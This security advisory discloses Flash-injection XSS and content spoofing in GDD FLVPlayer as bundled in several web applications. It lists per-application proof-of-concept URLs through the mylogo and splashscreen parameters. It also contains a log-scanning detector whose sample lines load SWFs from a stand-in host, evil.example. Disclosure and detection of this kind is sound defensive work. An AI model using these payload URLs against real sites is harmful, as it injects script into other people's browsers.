Hello 3APA3A!
These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications which bundle GDD FLVPlayer. Earlier I wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is a Flash video and audio player, which is used at thousands of web sites and in multiple web applications.
Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer for MODx, Pixelfind Administrator, WHMCompleteSolution and other web applications. This Flash video and audio player is also used at many web sites as a standalone web application.
Web applications which use GDD FLVPlayer v3.635 and previous versions are vulnerable.
The following web applications are vulnerable:
Order Master Pro (all versions)
CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions.
gddflvplayer for MODx (all versions).
Pixelfind Administrator (all versions).
WHMCompleteSolution (all versions).
GDD FLVPlayer was developed by GeDeDe.
GeDeDe
http://www.gdd.ro
XSS (via Flash Injection) (WASC-08):
Order Master Pro:
http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf
CMS Pask 3 (Pixelwerk admin):
http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf
gddflvplayer for MODx:
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf
Pixelfind Administrator:
http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf
WHMCompleteSolution:
http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf
These are examples of the XSS vulnerabilities; for examples of the Content Spoofing vulnerabilities see the above-mentioned advisory.
I described these vulnerabilities at my site (http://websecurity.com.ua/6727/).
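All of the URLs above have the same shape: a request for gddflvplayer.swf whose mylogo or splashscreen parameter names another SWF, which the player then loads into the site's own Flash security context. The following script is an added example (not code from the advisory or from GeDeDe) showing how a defender can spot such requests in web server access logs, or use the same classifier as a blocking rule in front of the player. The parameter names and the player file name come from the advisory; the log format (Apache combined), the sample log lines, the IP addresses and the "off-site URL" heuristic are my own assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters that GDD FLVPlayer (<= v3.635) uses to load an extra SWF,
# per the advisory above. A hostile .swf passed here runs in the site's origin.
INJECTABLE_PARAMS = ("mylogo", "splashscreen")

# Constructed sample of Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2013:12:00:01 +0000] "GET /player/gddflvplayer.swf?file=intro.flv HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Sep/2013:12:00:02 +0000] "GET /player/gddflvplayer.swf?mylogo=xss.swf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Sep/2013:12:00:03 +0000] "GET /includes/flash/gddflvplayer.swf?splashscreen=http://evil.example/x.swf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Sep/2013:12:00:04 +0000] "GET /op/video/gddflvplayer.swf?mylogo=%2F%2Fevil.example%2Fl.SWF HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Sep/2013:12:00:05 +0000] "GET /assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=logo.png HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Sep/2013:12:00:06 +0000] "GET /index.php?mylogo=xss.swf HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def flash_injection_reason(target: str):
    """Return why a request target looks like a GDD FLVPlayer Flash injection,
    or None if it does not. Only requests for gddflvplayer.swf itself count:
    the player reads these parameters from its own URL, not from flashvars."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/gddflvplayer.swf"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in INJECTABLE_PARAMS:
        for raw in params.get(name, []):
            value = unquote(raw).strip()      # second pass catches double encoding
            low = value.lower()
            if low.endswith(".swf"):
                return f"{name} loads external SWF: {value}"
            # Assumption: the legitimate logo/splash image lives beside the
            # player, so an absolute or protocol-relative URL is suspicious too.
            if low.startswith(("http://", "https://", "//")):
                return f"{name} points off-site: {value}"
    return None


def scan_log(text: str):
    """Run the classifier over access log text; return one dict per hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = flash_injection_reason(m["target"])
        if reason:
            hits.append({
                "ip": m["ip"], "time": m["ts"], "status": m["status"],
                "target": m["target"], "reason": reason,
            })
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["time"]} {h["ip"]} {h["status"]} {h["target"]} -> {h["reason"]}')
```

On the constructed sample the scan flags the three requests from 203.0.113.9 (the literal xss.swf case, an absolute URL to an off-site SWF, and a URL-encoded protocol-relative one) and ignores the benign logo.png request and the request to index.php, which is not the player. The same flash_injection_reason() check can be wired into a web server rewrite rule or WAF to deny these requests until the player is updated.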
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua